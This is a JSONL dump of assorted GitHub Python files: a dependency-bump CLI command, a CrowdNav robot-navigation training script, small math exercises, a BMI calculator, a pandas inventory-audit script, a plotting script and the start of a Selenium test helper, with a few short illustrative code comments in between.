+{"seq_id":"11438960602","text":"from __future__ import absolute_import\nimport logging\n\nimport click\n\nfrom bumper import BumperDriver\n\nfrom workspace.commands import AbstractCommand\nfrom workspace.commands.helpers import expand_product_groups\nfrom workspace.config import config\nfrom workspace.scm import repo_check, current_branch\n\n\nlog = logging.getLogger(__name__)\n\n\nclass Bump(AbstractCommand):\n \"\"\"\n Bump dependency versions in requirements.txt, pinned.txt, or any specified file.\n\n :param str names: Only bump dependencies that match the name.\n Name can be a product group name defined in workspace.cfg.\n To bump to a specific version instead of latest, append version to name\n (e.g. requests==1.2.3 or 'requests>=1.2.3'). When > or < is used, be sure to quote.\n :param int test: Run tests.\n :param bool push: Push the change. Use with --test to test before pushing.\n :param bool add: Add the `names` to the requirements file if they don't exist.\n :param str msg: Summary commit message\n :param str/list file: Requirement file to bump. 
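# --- Added sketch: strftime/strptime round trip ---
# Self-contained illustration of the datetime formatting and parsing pair
# shown above; the format string is an invented example.
from datetime import datetime

dt = datetime(2011, 10, 29, 20, 30, 21)
text = dt.strftime('%Y%m%d %H:%M:%S')
parsed = datetime.strptime(text, '%Y%m%d %H:%M:%S')
print(text, parsed == dt)  # 20111029 20:30:21 True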
Defaults to requirements.txt or pinned.txt\n that are set by bump.requirement_files in workspace.cfg.\n :param dict bumper_models: List of classes that implements :class:`bumper.cars.AbstractBumper`\n Defaults to :class:`bumper.cars.RequirementsBumper`\n :param bool force: Force a bump even when certain bump requirements are not met.\n :param bool dry_run: Perform a dry run by printing out the changes only without making changes.\n :param dict kwargs: Additional args from argparse\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n kwargs.setdefault('show_filter', True)\n super(Bump, self).__init__(*args, **kwargs)\n\n @classmethod\n def arguments(cls):\n _, docs = cls.docs()\n return ([\n cls.make_args('names', nargs='*', help=docs['names']),\n cls.make_args('--add', action='store_true', help=docs['add']),\n cls.make_args('--force', action='store_true', help=docs['force']),\n cls.make_args('-m', '--msg', help=docs['msg']),\n cls.make_args('--file', help=docs['file']),\n cls.make_args('-n', '--dry-run', action='store_true', help=docs['dry_run'])\n ], [\n cls.make_args('-t', '--test', action='count', help=docs['test']),\n cls.make_args('-p', '--push', action='store_true', help=docs['push']),\n ])\n\n def run(self):\n \"\"\"\n :return: Tuple with 3 elements: A map of file to bump message, commit message, and list of :class:`Bump`\n \"\"\"\n repo_check()\n\n self.commander.run('update')\n\n if not self.names:\n self.names = []\n\n filter_requirements = expand_product_groups(self.names)\n\n if self.show_filter and filter_requirements:\n click.echo('Only bumping: {}'.format(' '.join(filter_requirements)))\n\n if isinstance(self.file, list):\n requirement_files = self.file\n elif self.file:\n requirement_files = [self.file]\n else:\n requirement_files = config.bump.requirement_files.strip().split()\n\n bumper = BumperDriver(requirement_files, bumper_models=self.bumper_models, full_throttle=self.force, detail=True,\n test_drive=self.dry_run)\n messages, bumps = bumper.bump(filter_requirements, required=self.add, show_summary=False)\n commit_msg = None\n\n try:\n if messages:\n summary_msgs = []\n detail_msgs = []\n for m in sorted(messages.values()):\n splits = m.split('\\n', 1)\n summary_msgs.append(splits[0])\n if len(splits) == 2:\n detail_msgs.append(splits[1])\n\n commit_msg = '\\n\\n'.join(summary_msgs + detail_msgs)\n\n if self.msg:\n commit_msg = self.msg + '\\n\\n' + commit_msg\n else:\n config.commit.auto_branch_from_commit_words = 1\n\n if not self.dry_run:\n self.commander.run('commit', msg=commit_msg, files=list(messages.keys()))\n config.commit.auto_branch_from_commit_words = 2 # Restore it for unit tests\n\n except Exception:\n bumper.reverse()\n raise\n\n if bumps:\n if self.test:\n click.echo('Running tests')\n self.commander.run('test', return_output=False, test_dependents=self.test > 1)\n\n if not self.dry_run:\n if self.push:\n branch = current_branch()\n self.commander.run('push', branch=branch)\n\n return messages, commit_msg, bumps\n","repo_name":"maxzheng/workspace-tools","sub_path":"workspace/commands/bump.py","file_name":"bump.py","file_ext":"py","file_size_in_byte":4853,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"34070743066","text":"import sys\nimport logging\nimport argparse\nimport configparser\nimport os\nimport shutil\nimport torch\nimport gym\nimport git\nfrom crowd_sim.envs.utils.robot import Robot\nfrom crowd_nav.utils.trainer import Trainer\nfrom crowd_nav.utils.memory import ReplayMemory\nfrom 
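# --- Added sketch: summary-then-detail commit message assembly ---
# Self-contained restatement of the message handling in Bump.run() above:
# split each bump message at its first newline, then emit all summaries
# before all details. The sample messages are invented.
messages = {
    'requirements.txt': 'Bump requests to 2.31.0\nChangelog: security fixes',
    'pinned.txt': 'Bump click to 8.1.7',
}
summary_msgs, detail_msgs = [], []
for m in sorted(messages.values()):
    splits = m.split('\n', 1)
    summary_msgs.append(splits[0])
    if len(splits) == 2:
        detail_msgs.append(splits[1])
commit_msg = '\n\n'.join(summary_msgs + detail_msgs)
print(commit_msg)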
crowd_nav.utils.explorer import Explorer\nfrom crowd_nav.policy.policy_factory import policy_factory\n\n\ndef main():\n parser = argparse.ArgumentParser('Parse configuration file')\n parser.add_argument('--env_config', type=str, default='configs/env.config')\n parser.add_argument('--policy', type=str, default='cadrl')\n parser.add_argument('--policy_config', type=str, default='configs/policy.config')\n parser.add_argument('--train_config', type=str, default='configs/train.config')\n parser.add_argument('--output_dir', type=str, default='data/output')\n parser.add_argument('--weights', type=str)\n parser.add_argument('--resume', default=False, action='store_true')\n parser.add_argument('--gpu', default=False, action='store_true')\n parser.add_argument('--debug', default=False, action='store_true')\n args = parser.parse_args()\n\n # configure paths\n make_new_dir = True\n if os.path.exists(args.output_dir):\n key = input('Output directory already exists! Overwrite the folder? (y/n)')\n if key == 'y' and not args.resume:\n shutil.rmtree(args.output_dir)\n else:\n make_new_dir = False\n args.env_config = os.path.join(args.output_dir, os.path.basename(args.env_config))\n args.policy_config = os.path.join(args.output_dir, os.path.basename(args.policy_config))\n args.train_config = os.path.join(args.output_dir, os.path.basename(args.train_config))\n if make_new_dir:\n os.makedirs(args.output_dir)\n shutil.copy(args.env_config, args.output_dir)\n shutil.copy(args.policy_config, args.output_dir)\n shutil.copy(args.train_config, args.output_dir)\n log_file = os.path.join(args.output_dir, 'output.log')\n il_weight_file = os.path.join(args.output_dir, 'il_model.pth')\n rl_weight_file = os.path.join(args.output_dir, 'rl_model.pth')\n\n # configure logging\n mode = 'a' if args.resume else 'w'\n file_handler = logging.FileHandler(log_file, mode=mode)\n stdout_handler = logging.StreamHandler(sys.stdout)\n level = logging.INFO if not args.debug else logging.DEBUG\n logging.basicConfig(level=level, handlers=[stdout_handler, file_handler],\n format='%(asctime)s, %(levelname)s: %(message)s', datefmt=\"%Y-%m-%d %H:%M:%S\")\n repo = git.Repo(search_parent_directories=True)\n logging.info('Current git head hash code: %s'.format(repo.head.object.hexsha))\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() and args.gpu else \"cpu\")\n logging.info('Using device: %s', device)\n\n # configure policy\n policy = policy_factory[args.policy]()\n if not policy.trainable:\n parser.error('Policy has to be trainable')\n if args.policy_config is None:\n parser.error('Policy config has to be specified for a trainable network')\n policy_config = configparser.RawConfigParser()\n policy_config.read(args.policy_config)\n policy.configure(policy_config)\n policy.set_device(device)\n\n # configure environment\n env_config = configparser.RawConfigParser()\n env_config.read(args.env_config)\n env = gym.make('CrowdSim-v0')\n env.configure(env_config)\n robot = Robot(env_config, 'robot')\n env.set_robot(robot)\n\n # read training parameters\n if args.train_config is None:\n parser.error('Train config has to be specified for a trainable network')\n train_config = configparser.RawConfigParser()\n train_config.read(args.train_config)\n rl_learning_rate = train_config.getfloat('train', 'rl_learning_rate')\n train_batches = train_config.getint('train', 'train_batches')\n train_episodes = train_config.getint('train', 'train_episodes')\n sample_episodes = train_config.getint('train', 'sample_episodes')\n target_update_interval = 
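# --- Added sketch: typed reads from RawConfigParser ---
# Self-contained illustration of the getint()/getfloat() pattern used for
# train.config above; the config text is an invented stand-in.
import configparser

cfg = configparser.RawConfigParser()
cfg.read_string('[train]\nrl_learning_rate = 0.001\ntrain_batches = 100\n')
print(cfg.getfloat('train', 'rl_learning_rate'))  # 0.001
print(cfg.getint('train', 'train_batches'))       # 100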
train_config.getint('train', 'target_update_interval')\n evaluation_interval = train_config.getint('train', 'evaluation_interval')\n capacity = train_config.getint('train', 'capacity')\n epsilon_start = train_config.getfloat('train', 'epsilon_start')\n epsilon_end = train_config.getfloat('train', 'epsilon_end')\n epsilon_decay = train_config.getfloat('train', 'epsilon_decay')\n checkpoint_interval = train_config.getint('train', 'checkpoint_interval')\n\n # configure trainer and explorer\n memory = ReplayMemory(capacity)\n model = policy.get_model()\n batch_size = train_config.getint('trainer', 'batch_size')\n trainer = Trainer(model, memory, device, batch_size)\n explorer = Explorer(env, robot, device, memory, policy.gamma, target_policy=policy)\n\n # imitation learning\n if args.resume:\n if not os.path.exists(rl_weight_file):\n logging.error('RL weights does not exist')\n model.load_state_dict(torch.load(rl_weight_file))\n rl_weight_file = os.path.join(args.output_dir, 'resumed_rl_model.pth')\n logging.info('Load reinforcement learning trained weights. Resume training')\n elif os.path.exists(il_weight_file):\n model.load_state_dict(torch.load(il_weight_file))\n logging.info('Load imitation learning trained weights.')\n else:\n il_episodes = train_config.getint('imitation_learning', 'il_episodes')\n il_policy = train_config.get('imitation_learning', 'il_policy')\n il_epochs = train_config.getint('imitation_learning', 'il_epochs')\n il_learning_rate = train_config.getfloat('imitation_learning', 'il_learning_rate')\n trainer.set_learning_rate(il_learning_rate)\n if robot.visible:\n safety_space = 0\n else:\n safety_space = train_config.getfloat('imitation_learning', 'safety_space')\n il_policy = policy_factory[il_policy]()\n il_policy.multiagent_training = policy.multiagent_training\n il_policy.safety_space = safety_space\n robot.set_policy(il_policy)\n explorer.run_k_episodes(il_episodes, 'train', update_memory=True, imitation_learning=True)\n trainer.optimize_epoch(il_epochs)\n torch.save(model.state_dict(), il_weight_file)\n logging.info('Finish imitation learning. 
Weights saved.')\n logging.info('Experience set size: %d/%d', len(memory), memory.capacity)\n explorer.update_target_model(model)\n\n # reinforcement learning\n policy.set_env(env)\n robot.set_policy(policy)\n robot.print_info()\n trainer.set_learning_rate(rl_learning_rate)\n # fill the memory pool with some RL experience\n if args.resume:\n robot.policy.set_epsilon(epsilon_end)\n explorer.run_k_episodes(100, 'train', update_memory=True, episode=0)\n logging.info('Experience set size: %d/%d', len(memory), memory.capacity)\n episode = 0\n while episode < train_episodes:\n if args.resume:\n epsilon = epsilon_end\n else:\n if episode < epsilon_decay:\n epsilon = epsilon_start + (epsilon_end - epsilon_start) / epsilon_decay * episode\n else:\n epsilon = epsilon_end\n robot.policy.set_epsilon(epsilon)\n\n # evaluate the model\n if episode % evaluation_interval == 0:\n explorer.run_k_episodes(env.case_size['val'], 'val', episode=episode)\n\n # sample k episodes into memory and optimize over the generated memory\n explorer.run_k_episodes(sample_episodes, 'train', update_memory=True, episode=episode)\n trainer.optimize_batch(train_batches)\n episode += 1\n\n if episode % target_update_interval == 0:\n explorer.update_target_model(model)\n\n if episode != 0 and episode % checkpoint_interval == 0:\n torch.save(model.state_dict(), rl_weight_file)\n\n # final test\n explorer.run_k_episodes(env.case_size['test'], 'test', episode=episode)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"vita-epfl/CrowdNav","sub_path":"crowd_nav/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8012,"program_lang":"python","lang":"en","doc_type":"code","stars":500,"dataset":"github-code","pt":"72"} +{"seq_id":"1616691818","text":"def permute(a, l, r):\n if l == r:\n return ''.join(a)\n else:\n permutations = []\n for i in range(l,r+1):\n a[l], a[i] = a[i], a[l]\n p = permute(a, l+1, r)\n for j in p:\n permutations.append(j)\n a[l], a[i] = a[i], a[l]\n return permutations\n16/21\ndef programmerStrings(s):\n t = 'programmer'\n first_end = 0\n last_begin = len(s) - 1\n for i in range(0,len(s)):\n prefix = s[0:i+1]\n permutations = permute(list(prefix), 0, i)\n for p in permutations:\n if t in p:\n first_end = i\n break\n if first_end != 0:\n break\n for i in range(len(s)-1,-1,-1):\n suffix = s[i : len(s)]\n permutations = permute(list(suffix), 0, i)\n for p in permutations:\n if t in p:\n last_begin = i\n break\n if last_begin != 0:\n break\n return last_begin - first_end - 1","repo_name":"minjeoong/baekjoon_","sub_path":"test4_result2.py","file_name":"test4_result2.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72497802152","text":"__author__ = 'jean'\n\ndef secant(base, exp=2, it=20):\n def f(x):\n return x**exp - base\n x1 = base /(exp**2)\n xnm1 = x1 - 5\n xnm2 = x1 + 5\n xn = 0\n for n in range(it):\n q = (xnm1-xnm2)/(f(xnm1)-f(xnm2))\n xn = xnm1 - (f(xnm1)*q)\n xnm1, xnm2 = xn, xnm1\n return xn\n\nprint(secant(2, 2))\n","repo_name":"nsabimana/Python-Jean-Paul-Nsabimana","sub_path":"forwhile.py","file_name":"forwhile.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11156397710","text":"#This program calculates the body mass of a person.\n#It asks for height in meters and provides weight in kg\n\nprint(\"This program calculates your Body Mass Index (BMI) and its 
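# --- Added sketch: verifying the secant iteration against math.sqrt ---
# Self-contained version of the secant update above for f(x) = x**2 - 2,
# with a zero-denominator guard once the iterates coincide; the start
# values are invented.
import math

def f(x):
    return x * x - 2.0

x_prev, x_curr = 2.0, 1.0
for _ in range(20):
    denom = f(x_curr) - f(x_prev)
    if denom == 0.0:  # converged to machine precision
        break
    x_prev, x_curr = x_curr, x_curr - f(x_curr) * (x_curr - x_prev) / denom
print(x_curr, math.sqrt(2))  # both ~1.4142135623730951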
classification\")\n\nweight = float ( input(\"Type your Weight in Kg (example 80): \") )\nheight = float ( input(\"Type your Height in Meters (example 1.80): \") )\n\nbmi = weight / (height ** 2)\nprint(\"Your BMI is: \", round(bmi, 2))\n\nif (bmi <= 18.5):\n classification = \"Underweight\"\nelif (bmi > 18.5 and bmi <= 24.9):\n classification = \"Normal Weight\"\nelif (bmi > 24.9 and bmi <= 29.9):\n classification = \"Overweight\"\nelse:\n classification = \"Obese\"\nprint(\"The classification of your BMI is: \", classification)","repo_name":"mdbstrategies/pythonProject","sub_path":"17_ConditionalsExercise.py","file_name":"17_ConditionalsExercise.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11489395407","text":"import pandas as pd\nfrom datetime import datetime\nfrom cl_cleaning import CleaningText as ct \nfrom ica_raw import InternalControlAnalysis \n\n# Configuraciones \npd.set_option('float_format', '{:,.2f}'.format) # Configura pandas para mostrar solo dos decimales \n\n# Importar bases de datos \nbd = pd.read_csv('input/base2345.csv', sep=';', dtype='object')\nf4 = pd.read_csv('input/210513-015942-f4-output.csv', sep=';', dtype='object')\nf3 = pd.read_csv('input/210513-204312-f3v1-output.csv', sep=';', dtype='object')\nkpi = pd.read_csv('input/210528-153310-kpi.csv', sep=';', dtype='object')\n\n# Variables\ndt_string = datetime.now().strftime('%y%m%d-%H%M')\nindex_name = 'indice_b25'\ncost_column = 'total'\n\n# Normalizar nombres de columnas\nbd = ct.normalizar_cols(bd)\nf4 = ct.normalizar_cols(f4)\nf3 = ct.normalizar_cols(f3)\nkpi = ct.normalizar_cols(kpi)\n\n# Convertir columnas de precio a dato numérico\nbd = ct.convertir_a_numero(bd, ['precio_costo', 'total'])\n\n# Generar indice en columna\nbd.reset_index(inplace=True)\nbd.rename(columns={'index': index_name}, inplace=True)\n\n# Obtener el año de la reserva, el envío y la recepción\ncolsf4 = ['fecha creacion', 'fecha reserva', 'fecha envio']\nnewcolsf4 = ['aaaa creacion', 'aaaa reserva', 'aaaa envio']\nf4[newcolsf4] = f4[colsf4].apply(lambda x: x.str.extract('(\\d{4})', expand=False))\n\ncolsf3 = ['fecha reserva', 'fecha envio', 'fecha anulacion','fecha confirmacion']\nnewcolsf3 = ['aaaa reserva', 'aaaa envio', 'aaaa anulacion','aaaa confirmacion']\nf3[newcolsf3] = f3[colsf3].apply(lambda x: x.str.extract('(\\d{4})', expand=False))\n\nkpi['aaaa paletiza'] = kpi['fecha_paletiza'].str.extract('(\\d{4})')\n\n# Extrae los valores númericos del campo entrada del kpi \nkpi['entrada'] = kpi.entrada.str.extract('(\\d+)', expand=False)\n\n# Análisis de F3\nbd.loc[bd['estatus final']=='Recibido en CD', 'nef'] = 'Recibido en CD'\nbd.loc[(bd['estatus final']=='Dado de baja por entregado a cliente -(Autoriza Gerencia de Control Operacional)') \n | (bd['estatus final']=='Dado de baja por F12 entregado en tienda antes de inventario (Autoriza Gerencia de Control Operacional) ') \n | (bd['estatus final']=='Dado de baja por error en la generación de la NC - Autoriza Gerencia de Control Operacional) ') \n | (bd['estatus final']=='Cierre x F4 Cobrado a terceros'), 'nef'] = 'F4s'\nbd.loc[bd['estatus final'] == 'Con F3 Proveedor ','nef'] = 'Con F3 Proveedor'\n\nica = InternalControlAnalysis(bd,index_name, cost_column)\n\ndff3p = bd[(bd['estatus final'] == 'Con F3 Proveedor ') & (bd['tpificacion'] == 'CERRADO ')]\n\nnf3p = dff3p.shape[0]\ncf3p = dff3p[cost_column].sum()\n\ndff3p2, nfnan, cfnan = ica.get_fnan( dff3p, 'f3', 'F3')\ndff3p3, ndu, 
cdu = ica.get_duplicates( dff3p2, ['f3', 'upc'], 'F3')\nne, nne, cne = ica.get_notfound( dff3p3, f3, ['f3', 'upc'], ['nro devolucion', 'upc'], 'nro devolucion', 'F3')\nbdf3cant = pd.merge(dff3p3, f3, left_on=['f3','upc'], right_on=['nro devolucion','upc']) # Unir b2345 con F3\nbdf3cant2, ndc, cdc = ica.get_diffqty(bdf3cant, 'unidades', 'cantidad', 'F3')\nbdf3cant3, nanu, canu = ica.get_canceledstatus(bdf3cant2, 'descripcion.6', 'F3') # TODO cambiar por get_equalvalue()\n\n# TODO revisar porque no funciona \nbdf3conf = bdf3cant3[bdf3cant3['descripcion.6']=='Confirmado']\nbdf3conf2, ndy, cdy = ica.get_diffyear(bdf3conf, 'aaaa anulacion', '2021', 'F3')\n\niokf3 = bdf3cant3[index_name].values\nbd = ica.get_db()\nbd.loc[iokf3, 'CIF3'] = 'OKK'\nbd.loc[iokf3, 'CIA'] = 'OKK'\n\nprint('\\n ----------------- Base 2345 ----------------- ')\nprint('\\n ## Resumen de información según estatus final')\nprint(bd[['estatus final', cost_column]].groupby('estatus final').sum().sort_values(by=cost_column, ascending=False))\nprint('\\n--------------------------------------------------------------------')\nprint('## Análisis con F3 proveedor')\nprint('--------------------------------------------------------------------')\nprint('# Resumen: ')\nprint(f'= {nfnan+ndu+nne+ndc+nanu+ndy} de {nf3p} registros con novedad, por un valor de: {cfnan+cdu+cne+cdc+canu+cdy:,.2f}')\nprint('# Detalle: ')\nprint(f'- {nfnan} de {nf3p} registros cerrados sin número de F3, por un valor de {cfnan:,.2f}')\nprint(f'- {ndu} de {dff3p2.shape[0]} registros duplicados, por un valor de {cdu:,.2f}')\nprint(f'- {nne} de {dff3p3.shape[0]} registros no se encontraron en la base de F3, por un valor de {cne:,.2f}')\nprint(f'- {ndc} de {bdf3cant.shape[0]} registros no coinciden con cantidad de la base de F3, por un valor de {cdc:,.2f}')\nprint(f'- {nanu} de {bdf3cant2.shape[0]} registros anulados en la base de F3, por un valor de {canu:,.2f}')\nprint(f'- {ndy} de {bdf3cant3.shape[0]} registros no coindicen con el año de confirmación 2021, por un valor de {cdy:,.2f}')\nprint(bd[[cost_column, 'CIF3', 'estatus final']].groupby(['estatus final', 'CIF3']).sum().sort_values(by=cost_column, ascending=False))\nprint('--------------------------------------------------------------------')\n\n# Análisis de F4 \nbdcf4 = bd[(bd['tpificacion'] == 'CERRADO ')]\ndff4 = bdcf4[(bdcf4['estatus final']=='Dado de baja por entregado a cliente -(Autoriza Gerencia de Control Operacional)') \n | (bdcf4['estatus final']=='Dado de baja por F12 entregado en tienda antes de inventario (Autoriza Gerencia de Control Operacional) ') \n | (bdcf4['estatus final']=='Dado de baja por error en la generación de la NC - Autoriza Gerencia de Control Operacional) ') \n | (bdcf4['estatus final']=='Cierre x F4 Cobrado a terceros')]\n\nnf4 = dff4.shape[0]\ncf4 = dff4[cost_column].sum()\n\ndff42, nfnanf4, cfnanf4 = ica.get_fnan( dff4, 'f4', 'F4')\ndff43, nduf4, cduf4 = ica.get_duplicates( dff42, ['f4', 'upc'], 'F4')\nnef4, nnef4, cnef4 = ica.get_notfound( dff43, f4, ['f4', 'upc'], ['nro. red. inventario', 'upc'], 'nro. red. inventario', 'F4')\nbdf4cant = pd.merge(dff43, f4, left_on=['f4','upc'], right_on=['nro. red. 
inventario','upc']) # Unir b2345 con F4\nbdf4cant2, ndcf4, cdcf4 = ica.get_diffqty(bdf4cant, 'unidades', 'cantidad', 'F4')\nbdf4cant3, nanuf4, canuf4 = ica.get_canceledstatus(bdf4cant2, 'estado', 'F4')\nbdf4dy, ndyf4, cdyf4 = ica.get_diffyear(bdf4cant3, 'aaaa creacion', '2021', 'F4')\n\niokf4 = bdf4dy[index_name].values\nbd = ica.get_db()\nbd.loc[iokf4, 'CIF4'] = 'OKK'\nbd.loc[iokf4, 'CIA'] = 'OKK'\n\nprint('## Análisis con F4 ')\nprint('--------------------------------------------------------------------')\nprint('# Resumen: ')\nprint(f'= {nfnanf4+nduf4+nnef4+ndcf4+nanuf4} de {nf4} registros con novedad, por un valor de: {cfnanf4+cduf4+cnef4+cdcf4+canu:,.2f}')\nprint('# Detalle: ')\nprint(f'- {nfnanf4} de {nf4} registros cerrados sin número de F4, por un valor de {cfnanf4:,.2f}')\nprint(f'- {nduf4} de {dff42.shape[0]} registros duplicados, por un valor de {cduf4:,.2f}')\nprint(f'- {nnef4} de {dff43.shape[0]} registros no se encontraron en la base de F4, por un valor de {cnef4:,.2f}')\nprint(f'- {ndcf4} de {bdf4cant.shape[0]} registros no coinciden con cantidad de la base de F4, por un valor de {cdcf4:,.2f}')\nprint(f'- {nanuf4} de {bdf4cant2.shape[0]} registros anulados en la base de F4, por un valor de {canuf4:,.2f}')\nprint(f'- {ndyf4} de {bdf4cant3.shape[0]} registros no coindicen con el año de confirmación 2021, por un valor de {cdyf4:,.2f}')\nprint(bd[[cost_column, 'CIF4', 'estatus final']].groupby(['estatus final', 'CIF4']).sum().sort_values(by=cost_column, ascending=False))\nprint('--------------------------------------------------------------------')\n\n# Análisis de KPI\ndfkpi = bd[(bd['estatus final']=='Recibido en CD') & (bd['tpificacion']=='CERRADO ')]\nnkpi = dfkpi.shape[0]\nckpi = dfkpi[cost_column].sum()\n\ndfkpi2, nfnankpi, cfnankpi = ica.get_fnan( dfkpi, 'nro_f12', 'KPI')\ndfkpi3, ndukpi, cdukpi = ica.get_duplicates( dfkpi2, ['nro_f12', 'upc', 'unidades'], 'KPI')\nnekpi, nnekpi, cnekpi = ica.get_notfound( dfkpi3, kpi, ['nro_f12'], ['entrada'], 'entrada', 'KPI')\nbdkpi_year = pd.merge(dfkpi3, kpi, left_on=['nro_f12'], right_on=['entrada']) # Unir b2345 con KPI\nbdkpi_year2, ndykpi, cdykpi = ica.get_diffyear(bdkpi_year, 'aaaa paletiza', '2021', 'KPI')\n\niok_kpi = bdkpi_year2[index_name].values\nbd = ica.get_db()\nbd.loc[iok_kpi, 'CIKPI'] = 'OKK'\nbd.loc[iok_kpi, 'CIA'] = 'OKK'\n\nprint('## Análisis con KPI ')\nprint('--------------------------------------------------------------------')\nprint('# Resumen: ')\nprint(f'= {nfnankpi+ndukpi+nnekpi+ndykpi} de {nkpi} registros con novedad, por un valor de: {cfnankpi+cdukpi+cnekpi+cdykpi:,.2f}')\nprint('# Detalle: ')\nprint(f'- {nfnankpi} de {nkpi} registros cerrados sin número de F12, por un valor de {cfnankpi:,.2f}')\nprint(f'- {ndukpi} de {dfkpi2.shape[0]} registros duplicados, por un valor de {cdukpi:,.2f}')\nprint(f'- {nnekpi} de {dfkpi3.shape[0]} registros no se encontraron en la base de KPI, por un valor de {cnekpi:,.2f}')\nprint(f'- {ndykpi} de {bdkpi_year.shape[0]} registros no coindicen con el año paletiza 2021, por un valor de {cdykpi:,.2f}')\nprint('--------------------------------------------------------------------') \n\ntip = bd[bd['tpificacion']=='Cerrado']\ngbd = bd[['nef', 'CIA',cost_column]].groupby(['nef','CIA']).agg({'sum','size'}).reset_index()\ngbd.columns = gbd.columns.to_flat_index()\ngbd.columns = [\"_\".join(a) for a in gbd.columns.to_flat_index()]\ngbd.loc[gbd['nef_'] == 'Con F3 Proveedor', 'percentage'] = gbd.loc[gbd['nef_'] == 'Con F3 Proveedor', 'total_sum']/cf3p\ngbd.loc[gbd['nef_'] == 'F4s', 
'percentage'] = gbd.loc[gbd['nef_'] == 'F4s', 'total_sum'] / cf4\ngbd.loc[gbd['nef_'] == 'Recibido en CD', 'percentage'] = gbd.loc[gbd['nef_'] == 'Recibido en CD', 'total_sum'] / ckpi\ngbd.to_csv(f'output/{dt_string}-gbd.csv', sep=';', decimal=',', index=False)\n\n# Tareas finales \nbd = ica.get_db()\nbd.to_csv(f'output/{dt_string}-bd.csv', sep=';', decimal=',', index=False) # Guarda el archivo \nbdtotal = bd.merge(f3, how='left', left_on=['f3','upc'], right_on=['nro devolucion','upc'],indicator='F3_merge')\nbdtotal = bdtotal.merge(f4, how='left', left_on=['f4','upc'], right_on=['nro. red. inventario','upc'], indicator='F4_merge')\nbdtotal = bdtotal.merge(kpi, how='left', left_on='nro_f12', right_on='entrada', indicator='KPI_merge')\nbdtotal.drop_duplicates(subset=['indice_b25'], inplace=True)\nbdtotal.to_csv(f'output/{dt_string}-bdtotal.csv', sep=';', decimal=',', index=False)\n#kpi.to_csv(f'output/{dt_string}-kpi.csv', sep=';', decimal=',', index=False)","repo_name":"twofortyone/green","sub_path":"archive/tm_b2345.py","file_name":"tm_b2345.py","file_ext":"py","file_size_in_byte":10294,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14813237421","text":"import numpy as np\nimport os\nimport sys\nimport matplotlib.pyplot as plt\nimport matplotlib.colors\n\n\n######\nplt.rcParams[\"mathtext.fontset\"] = \"cm\" # Fonte matemática pro latex\nplt.rc('font', family='serif') # fonte tipo serif, p fica paredico com latex msm\nplt.rc('text', usetex=False) # esse vc deixa True e for salvar em pdf e False se for p salvar png\n######\nfig, ax = plt.subplots()\nfig.set_size_inches(7*0.393, 7*0.393) # o valor multiplicando é o tamanho em cm\n\n\n\nfiles = os.listdir(\"data/\")\n\nfor f in files:\n data = np.loadtxt(\"data/\" + f)\n ax.pcolormesh(data,cmap = \"plasma\", vmax=1)\n plt.savefig(\"plots/\" + f[:-4] + \".png\",bbox_inches='tight',dpi = 300) # salva em png\n ax.cla()\n\nplt.close()","repo_name":"Farinha96br/git_douts","sub_path":"Testes/heat/plot_sample.py","file_name":"plot_sample.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15114614350","text":"\"\"\"OpenStax Python helper for common actions.\"\"\"\n\nimport calendar\nimport datetime\nimport inspect\nimport os\nimport re\n\nfrom autochomsky import chomsky\nfrom builtins import FileNotFoundError\nfrom datetime import timedelta\nfrom itertools import repeat\nfrom random import randint\nfrom requests import HTTPError\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.webdriver.chrome import options, service\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.support import expected_conditions as expect\nfrom selenium.webdriver.support.ui import Select, WebDriverWait\nfrom time import sleep\nfrom urllib.parse import urlparse, ParseResult\n\ntry:\n from staxing.assignment import Assignment\nexcept ImportError: # pragma: no cover\n from assignment import Assignment\ntry:\n from staxing.page_load import SeleniumWait as Page\nexcept ImportError: # pragma: no cover\n from page_load import SeleniumWait as Page\n\n__version__ = '0.0.43'\n\n\nclass Helper(object):\n \"\"\"Primary parent control class.\"\"\"\n\n CONDENSED_WIDTH = 767 # pixels wide\n DEFAULT_WAIT_TIME = 15 
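# --- Added sketch: left merge with indicator= for reconciliation ---
# Self-contained illustration of the audit pattern used in tm_b2345.py above:
# a left merge tagged by indicator= marks rows found in the reference base
# ('both') versus findings ('left_only'). The frames are invented stand-ins.
import pandas as pd

bd = pd.DataFrame({'f3': ['A1', 'A2'], 'upc': ['111', '222']})
f3 = pd.DataFrame({'nro devolucion': ['A1'], 'upc': ['111']})
merged = bd.merge(f3, how='left', left_on=['f3', 'upc'],
                  right_on=['nro devolucion', 'upc'], indicator='F3_merge')
print(merged['F3_merge'].value_counts())  # both 1, left_only 1 (right_only 0)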
